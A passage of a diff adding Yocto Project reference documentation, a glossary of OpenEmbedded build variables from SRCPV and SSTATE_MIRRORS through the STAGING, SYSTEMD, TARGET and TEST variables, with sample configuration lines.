+ whether ``SRC_URI`` contains files that are machine-specific. If so,
+ the build system automatically changes ``PACKAGE_ARCH``. Setting this
+ variable to "0" disables this behavior.
+
+ :term:`SRCDATE`
+ The date of the source code used to build the package. This variable
+ applies only if the source was fetched from a Source Code Manager
+ (SCM).
+
+ :term:`SRCPV`
+ Returns the version string of the current package. This string is
+ used to help define the value of :term:`PV`.
+
+ The ``SRCPV`` variable is defined in the ``meta/conf/bitbake.conf``
+ configuration file in the :term:`Source Directory` as
+ follows:
+ ::
+
+ SRCPV = "${@bb.fetch2.get_srcrev(d)}"
+
+ Recipes that need to define ``PV`` do so with the help of the
+ ``SRCPV``. For example, the ``ofono`` recipe (``ofono_git.bb``)
+ located in ``meta/recipes-connectivity`` in the Source Directory
+ defines ``PV`` as follows:
+ ::
+
+ PV = "0.12-git${SRCPV}"
+
+ :term:`SRCREV`
+ The revision of the source code used to build the package. This
+ variable applies to Subversion, Git, Mercurial, and Bazaar only. Note
+ that if you want to build a fixed revision and you want to avoid
+ performing a query on the remote repository every time BitBake parses
+ your recipe, you should specify a ``SRCREV`` that is a full revision
+ identifier and not just a tag.
+
+ .. note::
+
+ For information on limitations when inheriting the latest revision
+ of software using ``SRCREV``, see the :term:`AUTOREV` variable
+ description and the
+ ":ref:`automatically-incrementing-a-binary-package-revision-number`"
+ section, which is in the Yocto Project Development Tasks Manual.
+
+ :term:`SSTATE_DIR`
+ The directory for the shared state cache.
+
+ :term:`SSTATE_EXCLUDEDEPS_SYSROOT`
+ This variable allows to specify indirect dependencies to exclude
+ from sysroots, for example to avoid the situations when a dependency on
+ any ``-native`` recipe will pull in all dependencies of that recipe
+ in the recipe sysroot. This behaviour might not always be wanted,
+ for example when that ``-native`` recipe depends on build tools
+ that are not relevant for the current recipe.
+
+ This way, irrelevant dependencies are ignored, which could have
+ prevented the reuse of prebuilt artifacts stored in the Shared
+ State Cache.
+
+ :term:`SSTATE_EXCLUDEDEPS_SYSROOT` is evaluated as two regular
+ expressions of recipe and dependency to ignore. An example
+ is the rule in :oe_git:`meta/conf/layer.conf </openembedded-core/tree/meta/conf/layer.conf>`::
+
+ # Nothing needs to depend on libc-initial
+ # base-passwd/shadow-sysroot don't need their dependencies
+ SSTATE_EXCLUDEDEPS_SYSROOT += "\
+ .*->.*-initial.* \
+ .*(base-passwd|shadow-sysroot)->.* \
+ "
+
+ The ``->`` substring represents the dependency between
+ the two regular expressions.
+
+ :term:`SSTATE_MIRROR_ALLOW_NETWORK`
+ If set to "1", allows fetches from mirrors that are specified in
+ :term:`SSTATE_MIRRORS` to work even when
+ fetching from the network is disabled by setting ``BB_NO_NETWORK`` to
+ "1". Using the ``SSTATE_MIRROR_ALLOW_NETWORK`` variable is useful if
+ you have set ``SSTATE_MIRRORS`` to point to an internal server for
+ your shared state cache, but you want to disable any other fetching
+ from the network.
+
+ :term:`SSTATE_MIRRORS`
+ Configures the OpenEmbedded build system to search other mirror
+ locations for prebuilt cache data objects before building out the
+ data. This variable works like fetcher :term:`MIRRORS`
+ and :term:`PREMIRRORS` and points to the cache
+ locations to check for the shared state (sstate) objects.
+
+ You can specify a filesystem directory or a remote URL such as HTTP
+ or FTP. The locations you specify need to contain the shared state
+ cache (sstate-cache) results from previous builds. The sstate-cache
+ you point to can also be from builds on other machines.
+
+ When pointing to sstate build artifacts on another machine that uses
+ a different GCC version for native builds, you must configure
+ ``SSTATE_MIRRORS`` with a regular expression that maps local search
+ paths to server paths. The paths need to take into account
+ :term:`NATIVELSBSTRING` set by the
+ :ref:`uninative <ref-classes-uninative>` class. For example, the
+ following maps the local search path ``universal-4.9`` to the
+ server-provided path server_url_sstate_path:
+ ::
+
+ SSTATE_MIRRORS ?= "file://universal-4.9/(.*) http://server_url_sstate_path/universal-4.8/\1 \n"
+
+ If a mirror uses the same structure as
+ :term:`SSTATE_DIR`, you need to add "PATH" at the
+ end as shown in the examples below. The build system substitutes the
+ correct path within the directory structure.
+ ::
+
+ SSTATE_MIRRORS ?= "\
+ file://.* http://someserver.tld/share/sstate/PATH;downloadfilename=PATH \n \
+ file://.* file:///some-local-dir/sstate/PATH"
+
+ :term:`SSTATE_SCAN_FILES`
+ Controls the list of files the OpenEmbedded build system scans for
+ hardcoded installation paths. The variable uses a space-separated
+ list of filenames (not paths) with standard wildcard characters
+ allowed.
+
+ During a build, the OpenEmbedded build system creates a shared state
+ (sstate) object during the first stage of preparing the sysroots.
+ That object is scanned for hardcoded paths for original installation
+ locations. The list of files that are scanned for paths is controlled
+ by the ``SSTATE_SCAN_FILES`` variable. Typically, recipes add files
+ they want to be scanned to the value of ``SSTATE_SCAN_FILES`` rather
+ than the variable being comprehensively set. The
+ :ref:`sstate <ref-classes-sstate>` class specifies the default list
+ of files.
+
+ For details on the process, see the
+ :ref:`staging <ref-classes-staging>` class.
+
+ :term:`STAGING_BASE_LIBDIR_NATIVE`
+ Specifies the path to the ``/lib`` subdirectory of the sysroot
+ directory for the build host.
+
+ :term:`STAGING_BASELIBDIR`
+ Specifies the path to the ``/lib`` subdirectory of the sysroot
+ directory for the target for which the current recipe is being built
+ (:term:`STAGING_DIR_HOST`).
+
+ :term:`STAGING_BINDIR`
+ Specifies the path to the ``/usr/bin`` subdirectory of the sysroot
+ directory for the target for which the current recipe is being built
+ (:term:`STAGING_DIR_HOST`).
+
+ :term:`STAGING_BINDIR_CROSS`
+ Specifies the path to the directory containing binary configuration
+ scripts. These scripts provide configuration information for other
+ software that wants to make use of libraries or include files
+ provided by the software associated with the script.
+
+ .. note::
+
+ This style of build configuration has been largely replaced by
+ ``pkg-config``. Consequently, if ``pkg-config`` is supported by the
+ library to which you are linking, it is recommended you use
+ ``pkg-config`` instead of a provided configuration script.
+
+ :term:`STAGING_BINDIR_NATIVE`
+ Specifies the path to the ``/usr/bin`` subdirectory of the sysroot
+ directory for the build host.
+
+ :term:`STAGING_DATADIR`
+ Specifies the path to the ``/usr/share`` subdirectory of the sysroot
+ directory for the target for which the current recipe is being built
+ (:term:`STAGING_DIR_HOST`).
+
+ :term:`STAGING_DATADIR_NATIVE`
+ Specifies the path to the ``/usr/share`` subdirectory of the sysroot
+ directory for the build host.
+
+ :term:`STAGING_DIR`
+ Helps construct the ``recipe-sysroots`` directory, which is used
+ during packaging.
+
+ For information on how staging for recipe-specific sysroots occurs,
+ see the :ref:`ref-tasks-populate_sysroot`
+ task, the ":ref:`sdk-manual/sdk-extensible:sharing files between recipes`"
+ section in the Yocto Project Development Tasks Manual, the
+ ":ref:`configuration-compilation-and-staging-dev-environment`"
+ section in the Yocto Project Overview and Concepts Manual, and the
+ :term:`SYSROOT_DIRS` variable.
+
+ .. note::
+
+ Recipes should never write files directly under the ``STAGING_DIR``
+ directory because the OpenEmbedded build system manages the
+ directory automatically. Instead, files should be installed to
+ ``${``\ :term:`D`\ ``}`` within your recipe's :ref:`ref-tasks-install`
+ task and then the OpenEmbedded build system will stage a subset of
+ those files into the sysroot.
+
+ :term:`STAGING_DIR_HOST`
+ Specifies the path to the sysroot directory for the system on which
+ the component is built to run (the system that hosts the component).
+ For most recipes, this sysroot is the one in which that recipe's
+ :ref:`ref-tasks-populate_sysroot` task copies
+ files. Exceptions include ``-native`` recipes, where the
+ ``do_populate_sysroot`` task instead uses
+ :term:`STAGING_DIR_NATIVE`. Depending on
+ the type of recipe and the build target, ``STAGING_DIR_HOST`` can
+ have the following values:
+
+ - For recipes building for the target machine, the value is
+ "${:term:`STAGING_DIR`}/${:term:`MACHINE`}".
+
+ - For native recipes building for the build host, the value is empty
+ given the assumption that when building for the build host, the
+ build host's own directories should be used.
+
+ .. note::
+
+ ``-native`` recipes are not installed into host paths like such
+ as ``/usr``. Rather, these recipes are installed into
+ ``STAGING_DIR_NATIVE``. When compiling ``-native`` recipes,
+ standard build environment variables such as
+ :term:`CPPFLAGS` and
+ :term:`CFLAGS` are set up so that both host paths
+ and ``STAGING_DIR_NATIVE`` are searched for libraries and
+ headers using, for example, GCC's ``-isystem`` option.
+
+ Thus, the emphasis is that the ``STAGING_DIR*`` variables
+ should be viewed as input variables by tasks such as
+ :ref:`ref-tasks-configure`,
+ :ref:`ref-tasks-compile`, and
+ :ref:`ref-tasks-install`. Having the real system
+ root correspond to ``STAGING_DIR_HOST`` makes conceptual sense
+ for ``-native`` recipes, as they make use of host headers and
+ libraries.
+
+ :term:`STAGING_DIR_NATIVE`
+ Specifies the path to the sysroot directory used when building
+ components that run on the build host itself.
+
+ :term:`STAGING_DIR_TARGET`
+ Specifies the path to the sysroot used for the system for which the
+ component generates code. For components that do not generate code,
+ which is the majority, ``STAGING_DIR_TARGET`` is set to match
+ :term:`STAGING_DIR_HOST`.
+
+ Some recipes build binaries that can run on the target system but
+ those binaries in turn generate code for another different system
+ (e.g. cross-canadian recipes). Using terminology from GNU, the
+ primary system is referred to as the "HOST" and the secondary, or
+ different, system is referred to as the "TARGET". Thus, the binaries
+ run on the "HOST" system and generate binaries for the "TARGET"
+ system. The ``STAGING_DIR_HOST`` variable points to the sysroot used
+ for the "HOST" system, while ``STAGING_DIR_TARGET`` points to the
+ sysroot used for the "TARGET" system.
+
+ :term:`STAGING_ETCDIR_NATIVE`
+ Specifies the path to the ``/etc`` subdirectory of the sysroot
+ directory for the build host.
+
+ :term:`STAGING_EXECPREFIXDIR`
+ Specifies the path to the ``/usr`` subdirectory of the sysroot
+ directory for the target for which the current recipe is being built
+ (:term:`STAGING_DIR_HOST`).
+
+ :term:`STAGING_INCDIR`
+ Specifies the path to the ``/usr/include`` subdirectory of the
+ sysroot directory for the target for which the current recipe being
+ built (:term:`STAGING_DIR_HOST`).
+
+ :term:`STAGING_INCDIR_NATIVE`
+ Specifies the path to the ``/usr/include`` subdirectory of the
+ sysroot directory for the build host.
+
+ :term:`STAGING_KERNEL_BUILDDIR`
+ Points to the directory containing the kernel build artifacts.
+ Recipes building software that needs to access kernel build artifacts
+ (e.g. ``systemtap-uprobes``) can look in the directory specified with
+ the ``STAGING_KERNEL_BUILDDIR`` variable to find these artifacts
+ after the kernel has been built.
+
+ :term:`STAGING_KERNEL_DIR`
+ The directory with kernel headers that are required to build
+ out-of-tree modules.
+
+ :term:`STAGING_LIBDIR`
+ Specifies the path to the ``/usr/lib`` subdirectory of the sysroot
+ directory for the target for which the current recipe is being built
+ (:term:`STAGING_DIR_HOST`).
+
+ :term:`STAGING_LIBDIR_NATIVE`
+ Specifies the path to the ``/usr/lib`` subdirectory of the sysroot
+ directory for the build host.
+
+ :term:`STAMP`
+ Specifies the base path used to create recipe stamp files. The path
+ to an actual stamp file is constructed by evaluating this string and
+ then appending additional information. Currently, the default
+ assignment for ``STAMP`` as set in the ``meta/conf/bitbake.conf``
+ file is:
+ ::
+
+ STAMP = "${STAMPS_DIR}/${MULTIMACH_TARGET_SYS}/${PN}/${EXTENDPE}${PV}-${PR}"
+
+ For information on how BitBake uses stamp files to determine if a
+ task should be rerun, see the
+ ":ref:`overview-manual/overview-manual-concepts:stamp files and the rerunning of tasks`"
+ section in the Yocto Project Overview and Concepts Manual.
+
+ See :term:`STAMPS_DIR`,
+ :term:`MULTIMACH_TARGET_SYS`,
+ :term:`PN`, :term:`EXTENDPE`,
+ :term:`PV`, and :term:`PR` for related variable
+ information.
+
+ :term:`STAMPS_DIR`
+ Specifies the base directory in which the OpenEmbedded build system
+ places stamps. The default directory is ``${TMPDIR}/stamps``.
+
+ :term:`STRIP`
+ The minimal command and arguments to run ``strip``, which is used to
+ strip symbols.
+
+ :term:`SUMMARY`
+ The short (72 characters or less) summary of the binary package for
+ packaging systems such as ``opkg``, ``rpm``, or ``dpkg``. By default,
+ ``SUMMARY`` is used to define the
+ :term:`DESCRIPTION` variable if ``DESCRIPTION`` is
+ not set in the recipe.
+
+ :term:`SVNDIR`
+ The directory in which files checked out of a Subversion system are
+ stored.
+
+ :term:`SYSLINUX_DEFAULT_CONSOLE`
+ Specifies the kernel boot default console. If you want to use a
+ console other than the default, set this variable in your recipe as
+ follows where "X" is the console number you want to use:
+ ::
+
+ SYSLINUX_DEFAULT_CONSOLE = "console=ttyX"
+
+ The :ref:`syslinux <ref-classes-syslinux>` class initially sets
+ this variable to null but then checks for a value later.
+
+ :term:`SYSLINUX_OPTS`
+ Lists additional options to add to the syslinux file. You need to set
+ this variable in your recipe. If you want to list multiple options,
+ separate the options with a semicolon character (``;``).
+
+ The :ref:`syslinux <ref-classes-syslinux>` class uses this variable
+ to create a set of options.
+
+ :term:`SYSLINUX_SERIAL`
+ Specifies the alternate serial port or turns it off. To turn off
+ serial, set this variable to an empty string in your recipe. The
+ variable's default value is set in the
+ :ref:`syslinux <ref-classes-syslinux>` class as follows:
+ ::
+
+ SYSLINUX_SERIAL ?= "0 115200"
+
+ The class checks for and uses the variable as needed.
+
+ :term:`SYSLINUX_SERIAL_TTY`
+ Specifies the alternate console=tty... kernel boot argument. The
+ variable's default value is set in the
+ :ref:`syslinux <ref-classes-syslinux>` class as follows:
+ ::
+
+ SYSLINUX_SERIAL_TTY ?= "console=ttyS0,115200"
+
+ The class checks for and uses the variable as needed.
+
+ :term:`SYSLINUX_SPLASH`
+ An ``.LSS`` file used as the background for the VGA boot menu when
+ you use the boot menu. You need to set this variable in your recipe.
+
+ The :ref:`syslinux <ref-classes-syslinux>` class checks for this
+ variable and if found, the OpenEmbedded build system installs the
+ splash screen.
+
+ :term:`SYSROOT_DESTDIR`
+ Points to the temporary directory under the work directory (default
+ "``${``\ :term:`WORKDIR`\ ``}/sysroot-destdir``")
+ where the files populated into the sysroot are assembled during the
+ :ref:`ref-tasks-populate_sysroot` task.
+
+ :term:`SYSROOT_DIRS`
+ Directories that are staged into the sysroot by the
+ :ref:`ref-tasks-populate_sysroot` task. By
+ default, the following directories are staged:
+ ::
+
+ SYSROOT_DIRS = " \
+ ${includedir} \
+ ${libdir} \
+ ${base_libdir} \
+ ${nonarch_base_libdir} \
+ ${datadir} \
+ "
+
+ :term:`SYSROOT_DIRS_BLACKLIST`
+ Directories that are not staged into the sysroot by the
+ :ref:`ref-tasks-populate_sysroot` task. You
+ can use this variable to exclude certain subdirectories of
+ directories listed in :term:`SYSROOT_DIRS` from
+ staging. By default, the following directories are not staged:
+ ::
+
+ SYSROOT_DIRS_BLACKLIST = " \
+ ${mandir} \
+ ${docdir} \
+ ${infodir} \
+ ${datadir}/locale \
+ ${datadir}/applications \
+ ${datadir}/fonts \
+ ${datadir}/pixmaps \
+ "
+
+ :term:`SYSROOT_DIRS_NATIVE`
+ Extra directories staged into the sysroot by the
+ :ref:`ref-tasks-populate_sysroot` task for
+ ``-native`` recipes, in addition to those specified in
+ :term:`SYSROOT_DIRS`. By default, the following
+ extra directories are staged:
+ ::
+
+ SYSROOT_DIRS_NATIVE = " \
+ ${bindir} \
+ ${sbindir} \
+ ${base_bindir} \
+ ${base_sbindir} \
+ ${libexecdir} \
+ ${sysconfdir} \
+ ${localstatedir} \
+ "
+
+ .. note::
+
+ Programs built by ``-native`` recipes run directly from the sysroot
+ (:term:`STAGING_DIR_NATIVE`), which is why additional directories
+ containing program executables and supporting files need to be staged.
+
+ :term:`SYSROOT_PREPROCESS_FUNCS`
+ A list of functions to execute after files are staged into the
+ sysroot. These functions are usually used to apply additional
+ processing on the staged files, or to stage additional files.
+
+ :term:`SYSTEMD_AUTO_ENABLE`
+ When inheriting the :ref:`systemd <ref-classes-systemd>` class,
+ this variable specifies whether the specified service in
+ :term:`SYSTEMD_SERVICE` should start
+ automatically or not. By default, the service is enabled to
+ automatically start at boot time. The default setting is in the
+ :ref:`systemd <ref-classes-systemd>` class as follows:
+ ::
+
+ SYSTEMD_AUTO_ENABLE ??= "enable"
+
+ You can disable the service by setting the variable to "disable".
+
+ :term:`SYSTEMD_BOOT_CFG`
+ When :term:`EFI_PROVIDER` is set to
+ "systemd-boot", the ``SYSTEMD_BOOT_CFG`` variable specifies the
+ configuration file that should be used. By default, the
+ :ref:`systemd-boot <ref-classes-systemd-boot>` class sets the
+ ``SYSTEMD_BOOT_CFG`` as follows:
+ ::
+
+ SYSTEMD_BOOT_CFG ?= "${S}/loader.conf"
+
+ For information on Systemd-boot, see the `Systemd-boot
+ documentation <http://www.freedesktop.org/wiki/Software/systemd/systemd-boot/>`__.
+
+ :term:`SYSTEMD_BOOT_ENTRIES`
+ When :term:`EFI_PROVIDER` is set to
+ "systemd-boot", the ``SYSTEMD_BOOT_ENTRIES`` variable specifies a
+ list of entry files (``*.conf``) to install that contain one boot
+ entry per file. By default, the
+ :ref:`systemd-boot <ref-classes-systemd-boot>` class sets the
+ ``SYSTEMD_BOOT_ENTRIES`` as follows:
+ ::
+
+ SYSTEMD_BOOT_ENTRIES ?= ""
+
+ For information on Systemd-boot, see the `Systemd-boot
+ documentation <http://www.freedesktop.org/wiki/Software/systemd/systemd-boot/>`__.
+
+ :term:`SYSTEMD_BOOT_TIMEOUT`
+ When :term:`EFI_PROVIDER` is set to
+ "systemd-boot", the ``SYSTEMD_BOOT_TIMEOUT`` variable specifies the
+ boot menu timeout in seconds. By default, the
+ :ref:`systemd-boot <ref-classes-systemd-boot>` class sets the
+ ``SYSTEMD_BOOT_TIMEOUT`` as follows:
+ ::
+
+ SYSTEMD_BOOT_TIMEOUT ?= "10"
+
+ For information on Systemd-boot, see the `Systemd-boot
+ documentation <http://www.freedesktop.org/wiki/Software/systemd/systemd-boot/>`__.
+
+ :term:`SYSTEMD_PACKAGES`
+ When inheriting the :ref:`systemd <ref-classes-systemd>` class,
+ this variable locates the systemd unit files when they are not found
+ in the main recipe's package. By default, the ``SYSTEMD_PACKAGES``
+ variable is set such that the systemd unit files are assumed to
+ reside in the recipes main package:
+ ::
+
+ SYSTEMD_PACKAGES ?= "${PN}"
+
+ If these unit files are not in this recipe's main package, you need
+ to use ``SYSTEMD_PACKAGES`` to list the package or packages in which
+ the build system can find the systemd unit files.
+
+ :term:`SYSTEMD_SERVICE`
+ When inheriting the :ref:`systemd <ref-classes-systemd>` class,
+ this variable specifies the systemd service name for a package.
+
+ When you specify this file in your recipe, use a package name
+ override to indicate the package to which the value applies. Here is
+ an example from the connman recipe:
+ ::
+
+ SYSTEMD_SERVICE_${PN} = "connman.service"
+
+ :term:`SYSVINIT_ENABLED_GETTYS`
+ When using
+ :ref:`SysVinit <dev-manual/dev-manual-common-tasks:enabling system services>`,
+ specifies a space-separated list of the virtual terminals that should
+ run a `getty <http://en.wikipedia.org/wiki/Getty_%28Unix%29>`__
+ (allowing login), assuming :term:`USE_VT` is not set to
+ "0".
+
+ The default value for ``SYSVINIT_ENABLED_GETTYS`` is "1" (i.e. only
+ run a getty on the first virtual terminal).
+
+ :term:`T`
+ This variable points to a directory were BitBake places temporary
+ files, which consist mostly of task logs and scripts, when building a
+ particular recipe. The variable is typically set as follows:
+ ::
+
+ T = "${WORKDIR}/temp"
+
+ The :term:`WORKDIR` is the directory into which
+ BitBake unpacks and builds the recipe. The default ``bitbake.conf``
+ file sets this variable.
+
+ The ``T`` variable is not to be confused with the
+ :term:`TMPDIR` variable, which points to the root of
+ the directory tree where BitBake places the output of an entire
+ build.
+
+ :term:`TARGET_ARCH`
+ The target machine's architecture. The OpenEmbedded build system
+ supports many architectures. Here is an example list of architectures
+ supported. This list is by no means complete as the architecture is
+ configurable:
+
+ - arm
+ - i586
+ - x86_64
+ - powerpc
+ - powerpc64
+ - mips
+ - mipsel
+
+ For additional information on machine architectures, see the
+ :term:`TUNE_ARCH` variable.
+
+ :term:`TARGET_AS_ARCH`
+ Specifies architecture-specific assembler flags for the target
+ system. ``TARGET_AS_ARCH`` is initialized from
+ :term:`TUNE_ASARGS` by default in the BitBake
+ configuration file (``meta/conf/bitbake.conf``):
+ ::
+
+ TARGET_AS_ARCH = "${TUNE_ASARGS}"
+
+ :term:`TARGET_CC_ARCH`
+ Specifies architecture-specific C compiler flags for the target
+ system. ``TARGET_CC_ARCH`` is initialized from
+ :term:`TUNE_CCARGS` by default.
+
+ .. note::
+
+ It is a common workaround to append :term:`LDFLAGS` to
+ ``TARGET_CC_ARCH`` in recipes that build software for the target that
+ would not otherwise respect the exported ``LDFLAGS`` variable.
+
+ :term:`TARGET_CC_KERNEL_ARCH`
+ This is a specific kernel compiler flag for a CPU or Application
+ Binary Interface (ABI) tune. The flag is used rarely and only for
+ cases where a userspace :term:`TUNE_CCARGS` is not
+ compatible with the kernel compilation. The ``TARGET_CC_KERNEL_ARCH``
+ variable allows the kernel (and associated modules) to use a
+ different configuration. See the
+ ``meta/conf/machine/include/arm/feature-arm-thumb.inc`` file in the
+ :term:`Source Directory` for an example.
+
+ :term:`TARGET_CFLAGS`
+ Specifies the flags to pass to the C compiler when building for the
+ target. When building in the target context,
+ :term:`CFLAGS` is set to the value of this variable by
+ default.
+
+ Additionally, the SDK's environment setup script sets the ``CFLAGS``
+ variable in the environment to the ``TARGET_CFLAGS`` value so that
+ executables built using the SDK also have the flags applied.
+
+ :term:`TARGET_CPPFLAGS`
+ Specifies the flags to pass to the C pre-processor (i.e. to both the
+ C and the C++ compilers) when building for the target. When building
+ in the target context, :term:`CPPFLAGS` is set to the
+ value of this variable by default.
+
+ Additionally, the SDK's environment setup script sets the
+ ``CPPFLAGS`` variable in the environment to the ``TARGET_CPPFLAGS``
+ value so that executables built using the SDK also have the flags
+ applied.
+
+ :term:`TARGET_CXXFLAGS`
+ Specifies the flags to pass to the C++ compiler when building for the
+ target. When building in the target context,
+ :term:`CXXFLAGS` is set to the value of this variable
+ by default.
+
+ Additionally, the SDK's environment setup script sets the
+ ``CXXFLAGS`` variable in the environment to the ``TARGET_CXXFLAGS``
+ value so that executables built using the SDK also have the flags
+ applied.
+
+ :term:`TARGET_FPU`
+ Specifies the method for handling FPU code. For FPU-less targets,
+ which include most ARM CPUs, the variable must be set to "soft". If
+ not, the kernel emulation gets used, which results in a performance
+ penalty.
+
+ :term:`TARGET_LD_ARCH`
+ Specifies architecture-specific linker flags for the target system.
+ ``TARGET_LD_ARCH`` is initialized from
+ :term:`TUNE_LDARGS` by default in the BitBake
+ configuration file (``meta/conf/bitbake.conf``):
+ ::
+
+ TARGET_LD_ARCH = "${TUNE_LDARGS}"
+
+ :term:`TARGET_LDFLAGS`
+ Specifies the flags to pass to the linker when building for the
+ target. When building in the target context,
+ :term:`LDFLAGS` is set to the value of this variable
+ by default.
+
+ Additionally, the SDK's environment setup script sets the
+ :term:`LDFLAGS` variable in the environment to the
+ ``TARGET_LDFLAGS`` value so that executables built using the SDK also
+ have the flags applied.
+
+ :term:`TARGET_OS`
+ Specifies the target's operating system. The variable can be set to
+ "linux" for glibc-based systems (GNU C Library) and to "linux-musl"
+ for musl libc. For ARM/EABI targets, "linux-gnueabi" and
+ "linux-musleabi" possible values exist.
+
+ :term:`TARGET_PREFIX`
+ Specifies the prefix used for the toolchain binary target tools.
+
+ Depending on the type of recipe and the build target,
+ ``TARGET_PREFIX`` is set as follows:
+
+ - For recipes building for the target machine, the value is
+ "${:term:`TARGET_SYS`}-".
+
+ - For native recipes, the build system sets the variable to the
+ value of ``BUILD_PREFIX``.
+
+ - For native SDK recipes (``nativesdk``), the build system sets the
+ variable to the value of ``SDK_PREFIX``.
+
+ :term:`TARGET_SYS`
+ Specifies the system, including the architecture and the operating
+ system, for which the build is occurring in the context of the
+ current recipe.
+
+ The OpenEmbedded build system automatically sets this variable based
+ on :term:`TARGET_ARCH`,
+ :term:`TARGET_VENDOR`, and
+ :term:`TARGET_OS` variables.
+
+ .. note::
+
+ You do not need to set the ``TARGET_SYS`` variable yourself.
+
+ Consider these two examples:
+
+ - Given a native recipe on a 32-bit, x86 machine running Linux, the
+ value is "i686-linux".
+
+ - Given a recipe being built for a little-endian, MIPS target
+ running Linux, the value might be "mipsel-linux".
+
+ :term:`TARGET_VENDOR`
+ Specifies the name of the target vendor.
+
+ :term:`TCLIBC`
+ Specifies the GNU standard C library (``libc``) variant to use during
+ the build process. This variable replaces ``POKYLIBC``, which is no
+ longer supported.
+
+ You can select "glibc", "musl", "newlib", or "baremetal"
+
+ :term:`TCLIBCAPPEND`
+ Specifies a suffix to be appended onto the
+ :term:`TMPDIR` value. The suffix identifies the
+ ``libc`` variant for building. When you are building for multiple
+ variants with the same :term:`Build Directory`, this
+ mechanism ensures that output for different ``libc`` variants is kept
+ separate to avoid potential conflicts.
+
+ In the ``defaultsetup.conf`` file, the default value of
+ ``TCLIBCAPPEND`` is "-${TCLIBC}". However, distros such as poky,
+ which normally only support one ``libc`` variant, set
+ ``TCLIBCAPPEND`` to "" in their distro configuration file resulting
+ in no suffix being applied.
+
+ :term:`TCMODE`
+ Specifies the toolchain selector. ``TCMODE`` controls the
+ characteristics of the generated packages and images by telling the
+ OpenEmbedded build system which toolchain profile to use. By default,
+ the OpenEmbedded build system builds its own internal toolchain. The
+ variable's default value is "default", which uses that internal
+ toolchain.
+
+ .. note::
+
+ If ``TCMODE`` is set to a value other than "default", then it is your
+ responsibility to ensure that the toolchain is compatible with the
+ default toolchain. Using older or newer versions of these
+ components might cause build problems. See the Release Notes for
+ the Yocto Project release for the specific components with which
+ the toolchain must be compatible. To access the Release Notes, go
+ to the :yocto_home:`Downloads </software-overview/downloads>`
+ page on the Yocto Project website and click on the "RELEASE
+ INFORMATION" link for the appropriate release.
+
+ The ``TCMODE`` variable is similar to :term:`TCLIBC`,
+ which controls the variant of the GNU standard C library (``libc``)
+ used during the build process: ``glibc`` or ``musl``.
+
+ With additional layers, it is possible to use a pre-compiled external
+ toolchain. One example is the Sourcery G++ Toolchain. The support for
+ this toolchain resides in the separate Mentor Graphics
+ ``meta-sourcery`` layer at
+ http://github.com/MentorEmbedded/meta-sourcery/.
+
+ The layer's ``README`` file contains information on how to use the
+ Sourcery G++ Toolchain as an external toolchain. In summary, you must
+ be sure to add the layer to your ``bblayers.conf`` file in front of
+ the ``meta`` layer and then set the ``EXTERNAL_TOOLCHAIN`` variable
+ in your ``local.conf`` file to the location in which you installed
+ the toolchain.
+
+ The fundamentals used for this example apply to any external
+ toolchain. You can use ``meta-sourcery`` as a template for adding
+ support for other external toolchains.
+
+ :term:`TEST_EXPORT_DIR`
+ The location the OpenEmbedded build system uses to export tests when
+ the :term:`TEST_EXPORT_ONLY` variable is set
+ to "1".
+
+ The ``TEST_EXPORT_DIR`` variable defaults to
+ ``"${TMPDIR}/testimage/${PN}"``.
+
+ :term:`TEST_EXPORT_ONLY`
+ Specifies to export the tests only. Set this variable to "1" if you
+ do not want to run the tests but you want them to be exported in a
+ manner that you to run them outside of the build system.
+
+ :term:`TEST_LOG_DIR`
+ Holds the SSH log and the boot log for QEMU machines. The
+ ``TEST_LOG_DIR`` variable defaults to ``"${WORKDIR}/testimage"``.
+
+ .. note::
+
+ Actual test results reside in the task log (``log.do_testimage``),
+ which is in the ``${WORKDIR}/temp/`` directory.
+
+ :term:`TEST_POWERCONTROL_CMD`
+ For automated hardware testing, specifies the command to use to
+ control the power of the target machine under test. Typically, this
+ command would point to a script that performs the appropriate action
+ (e.g. interacting with a web-enabled power strip). The specified
+ command should expect to receive as the last argument "off", "on" or
+ "cycle" specifying to power off, on, or cycle (power off and then
+ power on) the device, respectively.
+
+ :term:`TEST_POWERCONTROL_EXTRA_ARGS`
+ For automated hardware testing, specifies additional arguments to
+ pass through to the command specified in
+ :term:`TEST_POWERCONTROL_CMD`. Setting
+ ``TEST_POWERCONTROL_EXTRA_ARGS`` is optional. You can use it if you
+ wish, for example, to separate the machine-specific and
+ non-machine-specific parts of the arguments.
+
+ :term:`TEST_QEMUBOOT_TIMEOUT`
+ The time in seconds allowed for an image to boot before automated
+ runtime tests begin to run against an image. The default timeout
+ period to allow the boot process to reach the login prompt is 500
+ seconds. You can specify a different value in the ``local.conf``
+ file.
+
+ For more information on testing images, see the
+ ":ref:`dev-manual/dev-manual-common-tasks:performing automated runtime testing`"
+ section in the Yocto Project Development Tasks Manual.
+
+ :term:`TEST_SERIALCONTROL_CMD`
+ For automated hardware testing, specifies the command to use to
+ connect to the serial console of the target machine under test. This
+ command simply needs to connect to the serial console and forward
+ that connection to standard input and output as any normal terminal
+ program does.
+
+ For example, to use the Picocom terminal program on serial device
+ ``/dev/ttyUSB0`` at 115200bps, you would set the variable as follows:
+ ::
+
+ TEST_SERIALCONTROL_CMD = "picocom /dev/ttyUSB0 -b 115200"
+
+ :term:`TEST_SERIALCONTROL_EXTRA_ARGS`
+ For automated hardware testing, specifies additional arguments to
+ pass through to the command specified in
+ :term:`TEST_SERIALCONTROL_CMD`. Setting
+ ``TEST_SERIALCONTROL_EXTRA_ARGS`` is optional. You can use it if you
+ wish, for example, to separate the machine-specific and
+ non-machine-specific parts of the command.
+
+ :term:`TEST_SERVER_IP`
+ The IP address of the build machine (host machine). This IP address
+ is usually automatically detected. However, if detection fails, this
+ variable needs to be set to the IP address of the build machine (i.e.
+ where the build is taking place).
+
+ .. note::
+
+ The ``TEST_SERVER_IP`` variable is only used for a small number of
+ tests such as the "dnf" test suite, which needs to download packages
+ from ``WORKDIR/oe-rootfs-repo``.
+
+ :term:`TEST_SUITES`
+ An ordered list of tests (modules) to run against an image when
+ performing automated runtime testing.
+
+ The OpenEmbedded build system provides a core set of tests that can
+ be used against images.
+
+ .. note::
+
+ Currently, there is only support for running these tests under
+ QEMU.
+
+ Tests include ``ping``, ``ssh``, ``df`` among others. You can add
+ your own tests to the list of tests by appending ``TEST_SUITES`` as
+ follows:
+ ::
+
+ TEST_SUITES_append = " mytest"
+
+ Alternatively, you can
+ provide the "auto" option to have all applicable tests run against
+ the image.
+ ::
+
+ TEST_SUITES_append = " auto"
+
+ Using this option causes the
+ build system to automatically run tests that are applicable to the
+ image. Tests that are not applicable are skipped.
+
+ The order in which tests are run is important. Tests that depend on
+ another test must appear later in the list than the test on which
